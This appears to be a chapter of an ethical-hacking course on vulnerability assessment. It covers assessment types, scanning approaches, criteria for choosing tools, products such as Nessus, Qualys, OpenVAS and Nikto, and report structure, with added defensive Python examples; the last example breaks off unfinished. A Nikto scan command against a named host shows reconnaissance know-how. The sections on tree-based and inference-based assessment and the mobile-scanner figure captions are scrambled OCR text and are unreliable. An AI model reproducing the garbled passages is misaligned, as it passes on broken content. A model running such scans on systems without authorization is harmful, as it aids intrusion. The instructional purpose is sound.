  Host-based assessments are a type of security check that involve conducting a configuration-level check to identify system configurations, user directories, file systems, registry settings, and other parameters to evaluate the possibility of compromise. These assessments check the security of a particular network or server. Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. Host-based assessments use many commercial and open-source scanning tools.
- Network-based Assessment

  Network assessments determine the possible network security attacks that may occur on an organization's system. These assessments discover network resources and map the ports and services running to various areas on the network. It evaluates the organization's system for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Network assessment professionals use firewalls and network scanners, such as Nessus. These scanners identify open ports, recognize the services running on those ports, and detect vulnerabilities associated with these services. These assessments help organizations identify points of entry and attack into a network since they follow the path and approach of the hacker. They help organizations determine how systems are vulnerable to Internet and intranet attacks, and how an attacker can gain access to important information. A typical network assessment conducts the following tests on a network:

  o Checks the network topologies for inappropriate firewall configuration
  o Examines the router filtering rules
  o Identifies inappropriately configured database servers
  o Tests individual services and protocols such as HTTP, SNMP, and FTP
  o Reviews HTML source code for unnecessary information
  o Performs bounds checking on variables

- Application Assessment

  An application assessment focuses on transactional Web applications, traditional client-server applications, and hybrid systems. It analyzes all elements of an application infrastructure, including deployment and communication within the client and server. This type of assessment tests the web server infrastructure for any misconfiguration, outdated content, or known vulnerabilities. Security professionals use both commercial and open-source tools to perform such assessments.

- Database Assessment

  A database assessment is any assessment focused on testing the databases for the presence of any misconfiguration or known vulnerabilities. These assessments mainly concentrate on testing various database technologies like MYSQL, MSSQL, ORACLE, and POSTGRESQL to identify data exposure or injection type vulnerabilities. Security professionals use both commercial and open-source tools to perform such assessments.
- Wireless Network Assessment

  Wireless network assessment determines the vulnerabilities in an organization's wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization's perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.
- Distributed Assessment

  This type of assessment, employed by organizations that possess assets like servers and clients at different locations, involves simultaneously assessing the distributed organization assets, such as client and server applications, using appropriate synchronization techniques. Synchronization plays a critical role in this type of assessment. By synchronizing the test runs together, all the separate assets situated at multiple locations can be tested at the same time.
- Credentialed Assessment

  Credentialed assessment is also called authenticated assessment. In this type of assessment, the ethical hacker possesses the credentials of all machines present in the assessed network. The chances of finding vulnerabilities related to operating systems and applications are higher in credentialed assessment than in non-credentialed assessment. This type of assessment is challenging since it is highly unclear who owns particular assets in large enterprises, and even when the ethical hacker identifies the actual owners of the assets, accessing the credentials of these assets is highly tricky since the asset owners generally do not share such confidential information. Also, even if the ethical hacker successfully acquires all required credentials, maintaining the password list is a huge task since there can be issues with things like changed passwords, typing errors, and administrative privileges. Although it is the best way of assessing a target enterprise network for vulnerabilities and is highly reliable, it is a complex assessment that is challenging.

- Non-Credentialed Assessment

  Non-credentialed assessment, also called unauthenticated assessment, provides a quick overview of weaknesses by analyzing the network services that are exposed by the host. Since it is a non-credentialed assessment, an ethical hacker does not require any credentials for the assets to perform their assessments. This type of assessment generates a brief report regarding vulnerabilities; however, it is not reliable because it does not provide deeper insight into the OS and application vulnerabilities that are not exposed by the host to the network. This assessment is also incapable of detecting the vulnerabilities that are potentially covered by firewalls. It is prone to false-positive outputs and is not reliably effective as compared to credential-based assessment.
- Manual Assessment

  After performing footprinting and network scanning and obtaining crucial information, if the ethical hacker performs manual research for exploring the vulnerabilities or weaknesses, they manually rank the vulnerabilities and score them by referring to vulnerability scoring standards like CVSS and vulnerability databases like CVE and CWE. Such assessment is considered to be manual.

- Automated Assessment

  An assessment where an ethical hacker uses vulnerability assessment tools such as Nessus, Qualys, or GFI LanGuard to perform a vulnerability assessment of the target is called an automated assessment. Unlike manual assessments, in this type of assessment, the ethical hacker does not perform footprinting and network scanning. They employ automated tools that can perform all such activities and are also capable of identifying weaknesses and CVSS scores, acquiring critical CVE/CWE information related to the vulnerability, and suggesting remediation strategies.

Module Flow

Vulnerability Assessment Solutions and Tools

Vulnerability assessment solutions are important tools for information security management as they identify all potential security weaknesses before an attacker can exploit them. There are different approaches and solutions available to perform a vulnerability assessment. Selecting an appropriate assessment approach plays a major role in mitigating the threats that an organization faces. This section outlines the various approaches, solutions, and tools used to perform a vulnerability assessment.

Comparing Approaches to Vulnerability Assessment

There are four types of vulnerability assessment solutions: product-based solutions, service-based solutions, tree-based assessment, and inference-based assessment.
- Product-Based Solutions

  Product-based solutions are installed in the organization's internal network. They are installed either on a private or non-routable space or in the Internet-addressable

  portion of an organization's network. If they are installed on a private network (behind the firewall), they cannot always detect outside attacks.
- Service-Based Solutions

  Service-based solutions are offered by third parties, such as auditing or security consulting firms. Some solutions are hosted inside the network, while others are hosted outside the network. A drawback of this solution is that attackers can audit the network from the outside.
Tree-Based
Assessment
Ina tree-basedassessment,
component
the auditorselectsdifferent
of the informationsystem.
for servers runningWindows,
Forexample,
databases,
for
each
strategies machineor
theadministratorselectsa scanner
andweb services but uses a different scanner
for Linuxservers. Thisapproach
relieson theadministratorto provide a startingpieceof
intelligence, and then to start scanningcontinuously without incorporating any

Inference-Based
at of
informationfound the time scanning,
Assessment
In an inference-based scanning starts bybuilding
assessment, of the
an inventory
protocols
foundon themachine.Afterfinding thescanningprocessstarts to
a protocol,
detectwhichportsare attachedto services, suchas an emailserver, web server, or
server. Afterfinding
database services, it selects
vulnerabilities
on eachmachine
and
startsto execute onlythoserelevantt ests.

Characteristics of a Good Vulnerability Assessment Solution

Organizations need to select a proper and suitable vulnerability assessment solution to detect, assess, and protect their critical IT assets from various internal and external threats. The characteristics of a good vulnerability assessment solution are as follows:

- Ensures correct outcomes by testing the network, network resources, ports, protocols, and operating systems
- Uses a well-organized inference-based approach for testing
- Automatically scans and checks against continuously updated databases
- Creates brief, actionable, customizable reports, including reports of vulnerabilities by severity level and trend analysis
- Supports multiple networks
- Suggests appropriate remedies and workarounds to correct vulnerabilities
- Imitates the outside view of attackers to gain its objective

Working of Vulnerability Scanning Solutions
Any organization needs to handle and process large volumes of data to conduct business. These large volumes of data contain privileged information of that particular organization. Attackers try to identify vulnerabilities that they can exploit, and then use these to gain access to critical data for illegal purposes. Vulnerability analysis analyzes and detects risk-prone areas in the organizational network. This analysis uses various tools and reports on the vulnerabilities present in the network.

Vulnerability scanning solutions perform vulnerability penetration tests on the organizational network in three steps:

- Locating nodes: The first step in vulnerability scanning is to locate live hosts in the target network using various scanning techniques.
- Performing service and OS discovery on them: After detecting the live hosts in the target network, the next step is to enumerate the open ports and services along with the operating system on the target systems.
- Testing those services and OS for known vulnerabilities: Finally, after identifying the open services and the operating system running on the target nodes, they are tested for known vulnerabilities.

Figure 5.5: The working of vulnerability scanning solutions (panels: Term of References; Perform Service and OS Discovery; Test Services and OS for Known Vulnerabilities; Findings and Recommendations)
Types of Vulnerability Assessment Tools

There are six types of vulnerability assessment tools: host-based vulnerability assessment tools, application-layer vulnerability assessment tools, depth assessment tools, scope assessment tools, active and passive tools, and location and data-examination tools.
- Host-Based Vulnerability Assessment Tools

  The host-based scanning tools are appropriate for servers that run various applications, such as the Web, critical files, databases, directories, and remote accesses. These host-based scanners can detect high levels of vulnerabilities and provide required information about the fixes (patches). A host-based vulnerability assessment tool identifies the OS running on a particular host computer and tests it for known deficiencies. It also searches for common applications and services.
- Depth Assessment Tools

  Depth assessment tools are used to discover and identify previously unknown vulnerabilities in a system. Generally, tools such as fuzzers, which provide arbitrary input to a system's interface, are used to identify vulnerabilities to an unstable depth. Many of these tools use a set of vulnerability signatures to test whether a product is resistant to a known vulnerability or not.

- Application-Layer Vulnerability Assessment Tools

  Application-layer vulnerability assessment tools are designed to serve the needs of all kinds of operating system types and applications. Various resources pose a variety of security threats and are identified by the tools designed for that purpose. Observing system vulnerabilities through the Internet using an external router, firewall, or web server is called an external vulnerability assessment. These vulnerabilities could be

  external DoS/DDoS threats, network data interception, or other issues. The analyst performs a vulnerability assessment and notes vulnerable resources. The network vulnerability information is regularly updated into the tools. Application-layer vulnerability assessment tools are directed towards web servers or databases.

Scope Assessment Tools

Scope assessment tools provide an assessment of the security by testing vulnerabilities in the applications and operating system. These tools provide standard controls and a reporting interface that allows the user to select a suitable scan. These tools generate a standard report based on the information found. Some assessment tools are designed to test a specific application or application type for vulnerability.
Active and Passive Tools

Active scanners perform vulnerability checks on the network functions that consume resources on the network. The main advantage of the active scanner is that the system administrator or IT manager has good control of the timing and the parameters of vulnerability scans. This scanner cannot be used for critical operating systems because it uses system resources that affect the processing of other tasks.

Passive scanners are those that do not considerably affect system resources, as they only observe system data and perform data processing on a separate analysis machine. A passive scanner first receives system data that provide complete information on the processes that are running and then assesses that data against a set of rules.

Location and Data Examination Tools

Listed below are some of the location and data examination tools:

- Network-Based Scanner: Network-based scanners are those that interact only with the real machine where they reside and give the report to the same machine after scanning.
- Agent-Based Scanner: Agent-based scanners reside on a single machine but can scan several machines on the same network.
- Proxy Scanner: Proxy scanners are the network-based scanners that can scan networks from any machine on the network.
- Cluster Scanner: Cluster scanners are similar to proxy scanners, but they can simultaneously perform two or more scans on different machines in the network.
Choosing a Vulnerability Assessment Tool

Vendor-designed vulnerability assessment tools can be used to test a host or application for vulnerabilities. There are several available vulnerability assessment tools that include port scanners, vulnerability scanners, and OS vulnerability assessment scanners. Organizations must choose appropriate tools based on their test requirements.

Choose the tools that best satisfy the following requirements:
- Tools must be capable of testing anywhere from dozens to 30,000 different vulnerabilities, depending on the product
- The selected tool should have a sound database of vulnerabilities and frequently updated attack signatures
- Pick a tool that matches the environment and expertise
- Make sure to update the scan engine regularly to ensure the tool is aware of the latest known vulnerabilities
- Verify that the chosen vulnerability assessment tool has accurate network mapping, application mapping, and penetration tests. Not all tools can find the protocols running and analyze a network's performance.
- Ensure that the tool has several regularly updated vulnerability scripts for the platforms you are scanning
- Make sure that any patches are applied; failing to do so might lead to false positives being returned
- Find out how many reports are returned, what information they contain, and whether they are exportable
- Check whether the tool has different levels of penetration to stop lockups
- The maintenance costs of tools can be offset by effectively using them
- Ensure that the vulnerability assessment tool can run its scans quickly and accurately
- Ensure that the tool can perform scans using multiple protocols
- Verify that the tool can understand and analyze the network topology to perform the assessment
- Bandwidth limitations are a major concern when dealing with large networks. Ensure the vulnerability assessment tool has high bandwidth allocation
- Ensure that the vulnerability assessment tool possesses excellent query throttling features
- Ensure that the tool can also assess fragile systems and non-traditional assets
Criteria for Choosing a Vulnerability Assessment Tool

The criteria to follow when choosing or purchasing any vulnerability assessment tool are as follows:
- Types of vulnerabilities being assessed: The most important information at the time of evaluating any tool is to find out how many types of vulnerabilities it will discover.
- Testing capability of scanning: The vulnerability assessment tool must have the capacity to execute the entire selected test and must scan all the systems selected for scanning.
- Ability to provide accurate reports: The ability to prepare an accurate report is essential. Vulnerability reports should be short, clear, and should provide an easy method to mitigate the discovered vulnerability.
- Efficient and accurate scanning: Two essential aspects of scanner performance are how much time it takes for a single host and what resources are required, and the loss of services at the time of scanning. It is important to ensure accuracy and to be aware of the accuracy of the results.
- Capability to perform a smart search: How clever they are at the time of scanning is also a key factor in judging any vulnerability assessment tool.
- Functionality for writing its own tests: When a signature is not present for a recently found vulnerability, it is helpful if the vulnerability scanning tool allows the use of user-developed tests.
- Test run scheduling: It is important to be able to do test-run scheduling as it allows users to perform scanning when traffic on the network is light.
Best Practices for Selecting Vulnerability Assessment Tools

Some of the best practices that can be adopted for selecting vulnerability assessment tools are:
- Vulnerability assessment tools are used to secure and protect the organization's system or network. Ensure that they do not damage the network or system while running.
- Before using any vulnerability assessment tools, it is important to understand their function and to decide what information is needed before starting.
- Security mechanisms for accessing from within and from outside the network are somewhat different, so decide the location for the scan based on the desired information.
- At the time of scanning, enable logging and ensure that all outcomes and methodologies are annotated every time a scan is performed on any computer.
- Users should frequently scan their systems for vulnerabilities and regularly monitor them for vulnerabilities and exploits.
Vulnerability Assessment Tools

An attacker performs vulnerability scanning to identify security loopholes in the target network that they can exploit to launch attacks. Security analysts can use vulnerability assessment tools to identify weaknesses present in the organization's security posture and remediate the identified vulnerabilities before an attacker exploits them.
Network vulnerability scanners help to analyze and identify vulnerabilities in the target network or network resources by using vulnerability assessment and network auditing. These tools also assist in overcoming weaknesses in the network by suggesting various remediation techniques.

The following are some of the most effective vulnerability assessment tools:

Qualys Vulnerability Management
Source: https://www.qualys.com

Qualys VM is a cloud-based service that gives immediate, global visibility into where IT systems might be vulnerable to the latest Internet threats and how to protect them. It helps to continuously identify threats and monitor unexpected changes in a network before they turn into breaches.

Features:
- Agent-based detection: Also works with the Qualys Cloud Agents, extending its network coverage to unscannable assets.
- Constant monitoring and alerts: When VM is paired with Continuous Monitoring (CM), InfoSec teams are proactively alerted about potential threats, so problems can be tackled before they turn into breaches.
- Comprehensive coverage and visibility: Continuously scans and identifies vulnerabilities for protecting IT assets on-premises, in the cloud, and at mobile endpoints. Its executive dashboard displays an overview of the security posture and gives access to remediation details. VM generates custom, role-based reports for multiple stakeholders, including automatic security documentation for compliance auditors.
- VM for the perimeter-less world: As enterprises adopt cloud computing, mobility, and other disruptive technologies for digital transformation, Qualys VM offers next-generation vulnerability management for these hybrid IT environments whose traditional boundaries have been blurred.
- Discover forgotten devices and organize the host assets: Qualys can help quickly determine what is running in different parts of the network, from the perimeter and corporate network to virtualized machines and cloud services. It can also identify unexpected access points, web servers, and other devices that can expose the network to attack.
- Scan systems everywhere for vulnerabilities: Scan systems anywhere accurately and efficiently from the same console, including the perimeter, the internal network, and cloud environments.
- Identify and prioritize risks: Using trend analysis, Zero-Day, and Patch impact predictions, Qualys can identify the highest business risks.
- Remediate vulnerabilities: Qualys's ability to track vulnerability data across hosts and time produces interactive reports that provide a better understanding of the security of the network.

Figure 5.6: Vulnerability scanning using Qualys Vulnerability Management

Nessus Professional
Source: https://www.tenable.com

Nessus Professional is an assessment solution for identifying vulnerabilities, configuration issues, and malware that attackers use to penetrate networks. It performs vulnerability, configuration, and compliance assessment. It supports various technologies such as operating systems, network devices, hypervisors, databases, tablets and phones, web servers, and critical infrastructure.

Nessus is the vulnerability scanning platform for auditors and security analysts. Users can schedule scans across multiple scanners, and use wizards to easily and quickly create policies, schedule scans, and send results via email.

Features:
- High-speed asset discovery
- Vulnerability assessment
- Malware and botnet detection
- Configuration and compliance auditing
- Scanning and auditing virtualized platforms and cloud

Figure 5.7: Vulnerability scanning using Nessus

GFI LanGuard
Source: https://www.gfi.com

GFI LanGuard scans for, detects, assesses, and rectifies security vulnerabilities in a network and its connected devices. This is done with minimal administrative effort. It scans the operating systems, virtual environments, and installed applications through vulnerability check databases. It enables analysis of the state of network security, identifies risks, and offers solutions before the system can be compromised.

Features:
- Patch management for operating systems and third-party applications
- Vulnerability assessment
- A web reporting console
- Track latest vulnerabilities and missing updates
- Integration with security applications
- Network device vulnerability checks
- Network and software auditing
- Support for virtual environments

Figure 5.8: Vulnerability scanning using GFI LanGuard

OpenVAS
Source: http://www.openvas.org

OpenVAS is a framework of several services and tools that offer a comprehensive and powerful vulnerability scanning and vulnerability management solution. The framework is part of Greenbone Network's commercial vulnerability management solution, developments from which have been contributed to the open-source community since 2008. The actual security scanner is accompanied by a regularly updated feed of Network Vulnerability Tests (NVTs), over 50,000 in total.
Figure 5.9: Vulnerability scanning using OpenVAS (report view for host 10.10.10.16, listing findings such as weak SSL/TLS cipher suites and timestamp disclosure)
Nikto
Source: https://cirt.net

Nikto is an Open Source (GPL) web server scanner that performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files or programs, checks for outdated versions of over 1250 servers, and checks for version-specific problems on over 270 servers. It also looks at server configuration items such as the presence of multiple index files and the HTTP server options and will attempt to identify installed web servers and software.

Features:
- SSL support (Unix with OpenSSL or maybe Windows with ActiveState's Perl/NetSSL)
- Full HTTP proxy support
- Checks for outdated server components
- Saves reports in plain text, XML, HTML, NBE or CSV
- A template engine to easily customize reports
- Scans multiple ports on a server, or multiple servers via input file
- LibWhisker's IDS encoding techniques
- Identifies installed software via headers, favicons, and files
- Host authentication with Basic and NTLM
- Subdomain guessing
- Apache and cgiwrap username enumeration
- Scan tuning to include or exclude entire classes of vulnerability checks
- Guesses credentials for authorization realms (including many default ID and password combinations)
Figure 5.10: Screenshot of Nikto (command `nikto -h www.certifiedhacker.com -Tuning ...` against target port 80; findings include "The anti-clickjacking X-Frame-Options header is not present", "The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type", and a potentially interesting archive, certifiedhacker.zip; the scan terminated after the error limit (20) was reached for the host, with 19 error(s) and 4 item(s) reported on the remote host in 591 seconds)
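The two header findings in the Nikto screenshot are simple presence checks on the HTTP response. The following is an added example, not Nikto's code, of how such a check is implemented: it parses a raw HTTP/1.x response, reports missing hardening headers in the same style Nikto uses, and also flags a version-bearing Server banner, which is the input to "outdated server component" checks. The sample response is constructed for the example and was not captured from any real host.

```python
"""Audit HTTP response headers the way a web server scanner reports them.

Added example (not Nikto's code). SAMPLE_RESPONSE is constructed, not a
capture from any real host.
"""
from __future__ import annotations

# Header name -> what its absence exposes. The first two entries are the
# findings Nikto reported in the screenshot above.
EXPECTED_HEADERS = {
    "x-frame-options": "page can be framed; clickjacking protection absent",
    "x-content-type-options": "browser may MIME-sniff content into a different type",
    "strict-transport-security": "HTTPS not enforced by the browser (HSTS absent)",
    "content-security-policy": "no CSP; injected script is not constrained",
}


def parse_response(raw: bytes) -> tuple[int, dict[str, str]]:
    """Split a raw HTTP/1.x response into (status code, lowercase header map).
    Repeated headers are joined with commas, as the HTTP spec allows."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        key = name.strip().lower()
        value = value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return status, headers


def audit_headers(raw: bytes) -> list[str]:
    """Return scanner-style findings for one response."""
    _status, headers = parse_response(raw)
    findings: list[str] = []
    for name, why in EXPECTED_HEADERS.items():
        if name not in headers:
            findings.append(f"{name} header not set: {why}")
    server = headers.get("server")
    if server and any(ch.isdigit() for ch in server):
        # A version string in the banner is what "outdated server" checks key on.
        findings.append(f"server banner discloses version: {server}")
    if headers.get("x-frame-options", "").upper().startswith("ALLOW-FROM"):
        findings.append("x-frame-options ALLOW-FROM is obsolete; modern browsers ignore it")
    return findings


# Constructed sample: HSTS and CSP are present, the two headers Nikto flagged
# above are missing, and the Server banner carries a version.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 19 Nov 2019 20:41:24 GMT\r\n"
    b"Server: Apache/2.4.41\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Strict-Transport-Security: max-age=31536000\r\n"
    b"Content-Security-Policy: default-src 'self'\r\n"
    b"\r\n"
    b"<html><body>hello</body></html>"
)

if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_RESPONSE):
        print("+", finding)
```

A missing header is a true finding only for responses a browser renders; the same check against a JSON API endpoint produces noise, which is one reason the report-analysis step later in this module warns about false positives.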
Listed below are some of the additional vulnerability assessment tools:
- Qualys FreeScan (https://freescan.qualys.com)
- Acunetix Web Vulnerability Scanner (https://www.acunetix.com)
- Nexpose (https://www.rapid7.com)
- Network Security Scanner (https://www.beyondtrust.com)
- SAINT (https://www.saintcorporation.com)
- Microsoft Baseline Security Analyzer (MBSA) (https://www.microsoft.com)
- beSECURE (AVDS) (https://www.beyondsecurity.com)
- Core Impact Pro (https://www.coresecurity.com)
- N-Stalker Web Application Security Scanner (https://www.nstalker.com)
- ManageEngine Vulnerability Manager Plus (https://www.manageengine.com)
Vulnerability Assessment Tools for Mobile

- Vulners Scanner
Source: https://vulners.com

Vulners Scanner is an Android application that performs passive vulnerability detection based on a software version's fingerprint. Since this is a passive method of vulnerability assessment, this app can only be used to identify vulnerabilities; it is not effective in performing compliance checks.
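Version-fingerprint matching of the kind described above, as an added example that is not Vulners code. It compares an installed-package inventory against an advisory table by version and shows the caveat every passive scanner has to handle: a distribution that backports a fix keeps the old upstream version number, so a comparison on the upstream version alone produces a false positive unless the package revision is taken into account. The inventory, the advisory table and the ADV-nnnn identifiers are all constructed placeholders.

```python
"""Passive vulnerability matching on software version fingerprints.

Added example, not Vulners code. INVENTORY, ADVISORIES and the ADV-nnnn
references are constructed placeholders.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional


def parse_version(v: str) -> tuple[tuple[int, ...], str]:
    """'1.18.0-0ubuntu1' -> ((1, 18, 0), '0ubuntu1'): the numeric upstream
    version plus the distribution revision, which is where backports live."""
    upstream, _, revision = v.partition("-")
    nums = tuple(int(x) for x in re.findall(r"\d+", upstream))
    return nums, revision


@dataclass(frozen=True)
class Advisory:
    ref: str                              # placeholder identifier
    package: str
    fixed_in: str                         # first unaffected upstream version
    fixed_revision: Optional[str] = None  # distro revision that backported the fix


def is_affected(installed: str, adv: Advisory) -> bool:
    """Affected when the upstream version is below fixed_in, unless the
    distribution revision shows the fix was backported. Revision strings are
    compared on their embedded numbers, which is enough for this constructed
    data; real scanners apply dpkg/rpm version comparison rules here."""
    inst_nums, inst_rev = parse_version(installed)
    fixed_nums, _ = parse_version(adv.fixed_in)
    if inst_nums >= fixed_nums:
        return False
    if adv.fixed_revision is not None and inst_rev:
        return parse_version(inst_rev)[0] < parse_version(adv.fixed_revision)[0]
    return True


def match_inventory(inventory: dict[str, str], advisories: list[Advisory]) -> dict[str, list[str]]:
    """Map each installed package to the advisory references that apply."""
    hits: dict[str, list[str]] = {}
    for adv in advisories:
        installed = inventory.get(adv.package)
        if installed and is_affected(installed, adv):
            hits.setdefault(adv.package, []).append(adv.ref)
    return hits


# Constructed inventory: package name -> installed version string.
INVENTORY = {
    "zlib": "1.2.11-1",
    "nginx": "1.18.0-0ubuntu1",
    "sudo": "1.8.31-1ubuntu1",
}

# Constructed advisory table with placeholder references.
ADVISORIES = [
    Advisory("ADV-0001", "zlib", "1.2.12"),                           # upstream compare: hit
    Advisory("ADV-0002", "nginx", "1.19.0", fixed_revision="0ubuntu1"),  # backported: no hit
    Advisory("ADV-0003", "sudo", "1.9.5", fixed_revision="1ubuntu2"),    # backport came later: hit
    Advisory("ADV-0004", "bash", "5.1"),                                # not installed
]

if __name__ == "__main__":
    for pkg, refs in match_inventory(INVENTORY, ADVISORIES).items():
        print(pkg, INVENTORY[pkg], "->", ", ".join(refs))
```

The nginx row is the instructive one: its upstream version is below the fixed version, yet the revision shows the fix is already present, so a scanner that only reads the upstream number would report a vulnerability that is not there.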

5.1: ~ rik
Figure Vulners
Scanner ertcal core

Modul
05 525
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Vuners
Seanner

5.12:VulnesScanner medium
Figure —
riskscore

SecurityMetrics
Mobile
Source:https://www.securitymetrics.com
SecurityMetrics Mobile is a mobiledefensetool that helps to identify
mobiledevice
wulnerabilitiesto protect sensitive data. It helps
customers’ to avoid threatsthat
originatefrommobilemalware,devicetheft,Wi-Finetworkconnectivity, data entry,
personal and businessuse, unwarrantedapp privileges, data and device storage,
account dataaccess,Bluetooth, (IR),
Infrared communication (NFC),
Near-field andSIM
SD
and cards.
MobileScancomplies
SecurityMetrics with PCI SSC(Payment Card Industry Security
Council)
Standards guidelines
to prevent mobiledatatheft.Oncompletion of a scan,the
reportgenerated
comprisesa total riskscore, a summary of discoveredvulnerabilities,
on howto resolvethreats,
andrecommendations

ical andCountermensores
Mackin ©by E-Comel
Copyright
securitysurnies

Figure5.1:SecurityMetrics
Mobile

ical
—
result

andCountermensores ©by E-Comel


Mackin Copyright
Module Flow
- Vulnerability Assessment Concepts
- Vulnerability Classification and Assessment Types
- Vulnerability Assessment Solutions and Tools
- Vulnerability Assessment Reports

Vulnerability Assessment Reports
In the vulnerability assessment process, once all the phases are completed, the security team will review the results and process the information to prepare the final report. In this phase, the security team will try to disclose any identified vulnerabilities, document any variations and findings, and include all these in the final report along with remediation steps to mitigate the identified risks.

The vulnerability assessment report discloses the risks that are detected through scanning the network. Tools such as Nessus, GFI LanGuard, and Qualys Vulnerability Management are used for vulnerability assessment. These tools provide a comprehensive assessment report in a specified format. The report alerts the organization to possible attacks and suggests countermeasures.

The report provides details of all the possible vulnerabilities with regard to the company's security policies. The vulnerabilities are categorized based on severity into three levels: High, Medium, and Low risk. High-risk vulnerabilities are those that might allow unauthorized access to the network. These vulnerabilities must be rectified immediately before the network is compromised. The report describes different kinds of attacks that are possible given the organization's set of operating systems, network components, and protocols.
The vulnerability assessment report must include, but is not limited to, the following points:
- The vulnerability's name, its date of discovery, and its mapped CVE ID
- The vulnerability's severity score (CVSS), together with its entry in the Common Vulnerabilities and Exposures (CVE) databases
- A detailed description of the vulnerability
- The impact of the vulnerability
- Details regarding the affected systems
- Details regarding the process needed to correct the vulnerability, including information on patches, configuration fixes, and ports to be blocked
- A proof of concept (PoC) of the vulnerability for the system (if possible)

Figure 5.25: Components of a vulnerability assessment report (scan information, target information, results)
Analyzing Vulnerability Scanning Report

A vulnerability assessment report provides detailed information on the vulnerabilities found in the computing environment. The report helps organizations identify the security posture of the computing systems (such as web servers, firewalls, routers, email, and file services) and provide solutions to reduce system failures. An ethical hacker must be careful in analyzing the vulnerability assessment reports to avoid false positives.

The assessment report helps organizations to take mitigation steps to proactively avoid risk by identifying, tracking, and eliminating security vulnerabilities.

Vulnerability reports cover the following elements:
- Scan information: Provides information such as the name of the scanning tool, its version, and the network ports to be scanned
- Target information: Contains information about the target system's name and address
- Results: A complete scanning report containing subtopics such as target, services, vulnerability, classification, and assessment
  - Target: Includes each host's detailed information and contains the following:
    - <Node>: Contains the name and address of the host
    - <OS>: Shows the operating system type
    - <Date>: Gives the date of the test
  - Services: Defines the network services by their names and ports
  - Classification: Allows the system administrator to obtain additional information about the scan, such as its origin
  - Assessment: Provides information regarding the scanner's assessment of discovered vulnerabilities
Vulnerability assessment reports are classified into two types:
- Security Vulnerability Reports
- Security Vulnerability Summaries

Security Vulnerability Report

This is a combined report for all the scanned devices and servers in the organization's network. The security vulnerability report includes the following details:
- Newly found vulnerabilities
- Open ports and detected services
- Suggestions for remediation
- Links to patches

A sample security vulnerability report is as follows:

Figure: Sample security vulnerability report (detailed results, exploits available)

Security Vulnerability Summary

This report is produced for every device or server after scanning. It gives a summary of the scan result that includes the following elements:
- Current security flaws
- Newly detected security vulnerabilities
- Categories of vulnerabilities
- The severity of vulnerabilities
- Resolved vulnerabilities
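The report elements listed above (<Node>, <OS>, <Date>, services with their ports, per-vulnerability assessment) and the summary items "newly detected" and "resolved" vulnerabilities can be produced mechanically from two scans of the same assets. The following is an added example, not the output format of Nessus, GFI LanGuard, Qualys or any other scanner named in this module: it parses a constructed XML report laid out with those element names, rates each finding High/Medium/Low, and diffs two consecutive scans. The severity thresholds (7.0 and 4.0 on the CVSS base score) are an assumption taken from the CVSS v3 qualitative scale; both sample reports and the VULN-nnnn references are constructed.

```python
"""Summarize and diff vulnerability scan reports.

Added example; the XML layout, both sample reports, the host address and the
VULN-nnnn references are constructed, and the High/Medium/Low thresholds are
an assumption based on the CVSS v3 qualitative scale.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    port: int
    service: str
    ref: str      # vulnerability identifier
    score: float  # CVSS base score


def severity(score: float) -> str:
    """Three-level rating used by the report (thresholds are an assumption)."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


def parse_report(xml_text: str) -> list[Finding]:
    """Read each <Target> (with <Node>, <OS>, <Date>) and the <Service> and
    <Vulnerability> elements beneath it into flat Finding records."""
    root = ET.fromstring(xml_text)
    findings: list[Finding] = []
    for target in root.iter("Target"):
        node = target.findtext("Node", "").strip()
        for svc in target.iter("Service"):
            port = int(svc.get("port", "0"))
            name = svc.get("name", "")
            for vuln in svc.iter("Vulnerability"):
                findings.append(Finding(node, port, name, vuln.get("ref", ""),
                                        float(vuln.get("cvss", "0"))))
    return findings


def summarize(findings: list[Finding]) -> dict[str, dict[str, int]]:
    """Per-host count of findings at each severity level."""
    out: dict[str, dict[str, int]] = {}
    for f in findings:
        per_host = out.setdefault(f.host, {"High": 0, "Medium": 0, "Low": 0})
        per_host[severity(f.score)] += 1
    return out


def diff_scans(previous: list[Finding], current: list[Finding]) -> tuple[set, set]:
    """(newly detected, resolved) between two scans of the same assets,
    keyed on host, port and vulnerability reference."""
    def key(f: Finding):
        return (f.host, f.port, f.ref)
    prev = {key(f) for f in previous}
    cur = {key(f) for f in current}
    return cur - prev, prev - cur


# Constructed sample reports: two scans of one host, a week apart.
SCAN_1 = """<Report tool="demo-scanner" version="0.1">
  <Target><Node>10.10.10.16</Node><OS>Linux</OS><Date>2019-11-12</Date>
    <Service port="22" name="ssh">
      <Vulnerability ref="VULN-0001" cvss="5.3"/>
    </Service>
    <Service port="443" name="https">
      <Vulnerability ref="VULN-0002" cvss="7.5"/>
      <Vulnerability ref="VULN-0003" cvss="3.7"/>
    </Service>
  </Target>
</Report>"""

SCAN_2 = """<Report tool="demo-scanner" version="0.1">
  <Target><Node>10.10.10.16</Node><OS>Linux</OS><Date>2019-11-19</Date>
    <Service port="22" name="ssh">
      <Vulnerability ref="VULN-0001" cvss="5.3"/>
    </Service>
    <Service port="443" name="https">
      <Vulnerability ref="VULN-0003" cvss="3.7"/>
      <Vulnerability ref="VULN-0004" cvss="9.8"/>
    </Service>
  </Target>
</Report>"""

if __name__ == "__main__":
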